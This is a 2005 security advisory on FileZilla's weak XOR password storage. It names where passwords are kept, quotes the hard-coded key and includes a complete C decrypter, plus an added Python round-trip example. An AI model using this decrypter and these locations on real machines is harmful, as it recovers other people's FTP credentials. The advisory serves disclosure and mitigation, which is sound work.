[NT] FileZilla Weak Password Encryption

From: SecuriTeam (support_at_securiteam.com)
Date: 09/19/05

    To: list@securiteam.com
    Date: 19 Sep 2005 10:37:21 +0200
    
    

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com

      FileZilla Weak Password Encryption
    ------------------------------------------------------------------------

    SUMMARY

    " <http://filezilla.sourceforge.net/> FileZilla is a fast and reliable FTP
    client and server with lots of useful features and an intuitive
    interface." The FileZilla client stores passwords using weak XOR
    substitution with static cypher key.

    DETAILS

    Vulnerable Systems:
     * FileZilla versions 2.2.14b and 2.2.15

    FileZilla saves configuration settings in two different locations:
     * In an XML file
     * In the Windows registry

    The method used to save configuration settings depends on the preferences
    used by the user during the installation of FileZilla. Either way, all
    configuration settings are stored in cleartext, EXCEPT for the password.
    However, the password is stored using very weak XOR "encryption" which can
    be easily reversed.

    There exists a problem in the way the XOR encryption is implemented
    because the same cipher key is always used. This key is hard-coded, which
    means that anyone can analyze the source code of the application and find
    it. Of course, this wouldn't be so easy if FileZilla wasn't an open source
    application.

    Once the key is known, an attacker can use it to decrypt the password back
    to its cleartext form. Because XOR is a symmetric operation, the same key
    is used for both encrypting and decrypting.

    As mentioned before, the rest of the configuration settings are all in
    cleartext. Information useful to an attacker includes the hostname of the
    server to connect to, the default port, and the username.

    If successfully exploited, this vulnerability will allow an attacker to
    access FTP (or SFTP) servers with the privileges of the user from whom the
    configuration settings were stolen.

    In practice, this vulnerability could be exploited after a machine has
    been compromised, or by fooling the user into executing malicious code.
    Such code could dump the configuration settings, decrypt the password(s)
    and send them all to the attacker.

    It is common to see many popular trojans out there that exploit weak
    encryption vulnerabilities of this type. These trojans dump the
    credentials of popular applications such as Internet Explorer, VNC or even
    dialup connections. FileZilla could be the next added application in the
    list of all those trojans with password-dumping features.

    This vulnerability is somewhat similar to the one found by Conde Vampiro in
    VNC 3 back in 1999. It's similar because in both cases we find an open
    source application using a fixed cipher key to decrypt passwords, which
    makes finding the key trivial.

    For more information on Conde Vampiro's findings visit:
    <http://www.securiteam.com/securitynews/3P5QERFQ0Q.html>

    The XML configuration file is found at:
    %programfiles%\FileZilla\FileZilla.xml
    The configuration settings are saved in the registry in:
    Hive: HKEY_CURRENT_USER
    Key: Software\FileZilla\Site Manager\[site_name]\
    Where [site_name] is the name given to the connection by the user.
    The password is saved in that key as a value with the following
    properties:
    Value: Pass
    Type: REG_SZ (NUL-terminated string)

    The cipher key can be found in Crypt.cpp and its value is:
    FILEZILLA1234567890ABCDEFGHIJKLMNOPQRSTUVWXYZ

    Solution:
    Choose "Use secure mode" during the installation (this prevents FileZilla
    from saving passwords), lock down the client machines where the FileZilla
    client is installed, or update to a patched version which fixes this issue
    (if available).

    Password Decrypter Code:
    /*

    Filename: filezilla-pwdec.c
    Title: FileZilla Client - Weakly encrypted password exploit v0.01
    Author: pagvac (Adrian Pastor)
    Date: 8th August, 2005
    License: GPL
    email: m123303[-a-t-]richmond.ac.uk
    homepage: www.ikwt.com (In Knowledge We Trust)
      www.adrianpv.com

    Description: this tool asks the user for the "encrypted" password and
      computes the cleartext version of the password

    Other info: compile as a Win32 console application project in Visual C++

    Copyright (C) 2005 pagvac (Adrian Pastor)

    This program is free software; you can redistribute it and/or
    modify it under the terms of the GNU General Public License
    as published by the Free Software Foundation; either version 2
    of the License, or (at your option) any later version.

    This program is distributed in the hope that it will be useful,
    but WITHOUT ANY WARRANTY; without even the implied warranty of
    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
    GNU General Public License for more details.

    You should have received a copy of the GNU General Public License
    along with this program; if not, write to the Free Software
    Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA
    02110-1301, USA.

    */

    //Includes
    #include <stdio.h>
    #include <string.h>
    #include <stdlib.h>
    #include <ctype.h>
    #include <windows.h>

    //Macros
    #define MAX_SIZE 150
    #define SLEEP_TIME 5000

    //Global variable (cypher key)
    const char *m_key = "FILEZILLA1234567890ABCDEFGHIJKLMNOPQRSTUVWXYZ";

    //PRE: decimal values representing ASCII chars,
    // every three digits becomes one ASCII char
    // e.g.: 042040063063
    //POST: ASCII chars are copied back to buff[]
    // e.g.: *(??
    // the length of the new string is returned
    unsigned int digit2char(char buff[])
    {
     char tmp_buff[4], ascii_buff[MAX_SIZE];
     unsigned int i, j, n, slen=strlen(buff), len=slen/3;
     for(i=0,j=0;i<slen;i+=3,++j)
     {
      tmp_buff[0]=buff[i];
      tmp_buff[1]=buff[i+1];
      tmp_buff[2]=buff[i+2];
      tmp_buff[3]='\0';

      n=atoi(tmp_buff);
      ascii_buff[j]=(char)n;
     }
     //A decoded byte is legitimately 0 when the password byte equals the key
     //byte at that position, so copy by length: strcpy() would stop at that
     //NUL and leave the remaining bytes of buff[] untouched.
     memcpy(buff, ascii_buff, len);
     buff[len]='\0';

     return len;
    }

    //PRE: buffer containing ASCII chars of cypher
    // (rather than their numeric ASCII value)
    //POST:length of cleartext password is returned
    unsigned int decrypt(char buff[])
    {
     unsigned int i, pos, len, klen=strlen(m_key);

     len=digit2char(buff);
     pos=len%klen;

     //XOR is symmetric: the same static key undoes the "encryption"
     for (i=0;i<len;i++)
      buff[i]=buff[i]^m_key[(i+pos)%klen];

     return len;
    }

    //Returns 1 if the string consists only of decimal digits, 0 otherwise
    int all_digits(const char *s)
    {
     for(;*s;++s)
      if(!isdigit((unsigned char)*s))
       return 0;
     return 1;
    }

    int main(void)
    {
     char cypher[MAX_SIZE];
     unsigned int len=0,i=0;

     printf("Enter cypher (encrypted password)\ne.g.: 120125125112000\n->");
     //The width limit (MAX_SIZE-1) keeps scanf() from overflowing cypher[]
     if(scanf("%149s", cypher)!=1)
      cypher[0]='\0';
     if(strlen(cypher)>0 && strlen(cypher)%3==0 && all_digits(cypher))
     {
      len=decrypt(cypher);
      printf("cleartext password:");
      for(i=0;i<len;++i)
       printf("%c",cypher[i]);
      printf("\n");
     }
     else
     {
      printf("You didn't enter a valid cypher!\n");
      printf("It should be a numeric value whose length is multiple of 3\n");
     }

     printf("Ending program in %d seconds...\n", SLEEP_TIME/1000);
     Sleep(SLEEP_TIME);
     return 0;
    }

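    The following Python round trip is an added example and is not code from
    the advisory, from its author, or from FileZilla. It reproduces the storage
    scheme exactly as the decrypter above describes it (each byte stored as a
    zero-padded three-digit decimal, XORed with the static key starting at
    offset length mod key length) and runs the same operation in both
    directions to show why a static-key XOR offers no protection: encryption
    and decryption are the same function, and the stored value leaks the
    password length with no key at all. That the encoder matches Crypt.cpp byte
    for byte is an assumption; the decoder's behaviour is taken from the tool
    above, including the embedded-NUL case that the C version must handle by
    length rather than with string functions.

```python
# Added example (not from the advisory or FileZilla): round trip through the
# FileZilla 2.x password storage scheme as the advisory's decrypter describes
# it. The encoder is the same XOR run forwards; its byte-for-byte match with
# Crypt.cpp is an assumption.

KEY = b"FILEZILLA1234567890ABCDEFGHIJKLMNOPQRSTUVWXYZ"  # static key quoted in the advisory


def xor_static_key(data: bytes) -> bytes:
    """XOR each byte with the key, starting at key offset len(data) % len(KEY).

    XOR is its own inverse, so this one function both "encrypts" and
    "decrypts". The only secret is the key, and the key is a constant.
    """
    pos = len(data) % len(KEY)
    return bytes(b ^ KEY[(i + pos) % len(KEY)] for i, b in enumerate(data))


def fz_encode(password: str) -> str:
    """Produce the stored 'Pass' form: each XORed byte as a 3-digit decimal."""
    return "".join(f"{b:03d}" for b in xor_static_key(password.encode("latin-1")))


def fz_decode(stored: str) -> str:
    """Recover the cleartext from a stored value, rejecting malformed input."""
    if len(stored) % 3 or not (stored.isascii() and stored.isdigit()):
        raise ValueError("stored value must be one or more groups of three decimal digits")
    triplets = [int(stored[i:i + 3]) for i in range(0, len(stored), 3)]
    if any(t > 255 for t in triplets):
        raise ValueError("a triplet above 255 is not a byte")
    # bytes() keeps embedded zero bytes, so a "000" group in the middle of the
    # value (password byte equal to the key byte at that position) is decoded
    # correctly rather than treated as a string terminator.
    return xor_static_key(bytes(triplets)).decode("latin-1")


def password_length_from_stored(stored: str) -> int:
    """The stored value reveals the password length without any key."""
    return len(stored) // 3


if __name__ == "__main__":
    # Sample taken from the decrypter's own usage prompt.
    print(fz_decode("120125125112000"))      # 11111
    # Constructed sample: for a one-byte password the key offset is 1, and
    # KEY[1] is 'I', so the password "I" is stored as "000".
    print(fz_encode("I"), fz_decode("000"))  # 000 I
    # Constructed sample: deterministic, so the same password always stores
    # the same value, and the round trip is exact.
    print(fz_decode(fz_encode("s3cret!")))   # s3cret!
```

    Because the scheme is deterministic and keyed by a constant, two users
    with the same password at the same length produce identical stored values,
    and anyone who can read the XML file or the registry key can reverse it;
    the "Use secure mode" option in the solution above is the only setting that
    keeps the password out of the configuration store altogether.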
    Complete Proof of concept code can be found at:
    <http://www.adrianpv.com/projects/filezilla-weak-encryption-research.zip>

    ADDITIONAL INFORMATION

    The information has been provided by pagvac (Adrian Pastor)
    <m123303@richmond.ac.uk>.
    The original article can be found at:
    <http://www.adrianpv.com/projects/filezilla-weak-encryption-research.zip>

